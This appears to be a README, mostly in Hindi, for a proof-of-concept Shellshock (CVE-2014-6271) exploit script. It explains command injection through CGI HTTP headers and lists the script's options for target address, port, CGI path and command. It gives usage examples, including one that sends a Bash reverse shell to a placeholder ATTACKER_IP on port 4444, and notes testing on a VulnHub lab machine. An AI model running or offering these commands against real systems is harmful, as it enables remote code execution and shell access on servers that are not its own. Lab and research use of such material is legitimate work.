
CVE-2014-6271 Exploit | by infrar3d
द्वारा शोषित infrar3d
यह रिपॉजिटरी CVE-2014-6271 (Shellshock) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल करता है।
Shellshock GNU Bash में एक गंभीर कमजोरी है जहाँ विशेष रूप से तैयार किए गए पर्यावरण चर मनमाना कमांड निष्पादन की अनुमति देते हैं।
जब कोई वेब सर्वर CGI स्क्रिप्ट में HTTP हेडर भेजता है जो Bash को आमंत्रित करती हैं, तो हमलावर उन हेडर के माध्यम से कमांड इंजेक्ट कर सकता है।
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(VulnHub मशीन "Hacksudo - Thor" पर परीक्षण किया गया)
यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारी से उपयोग करें।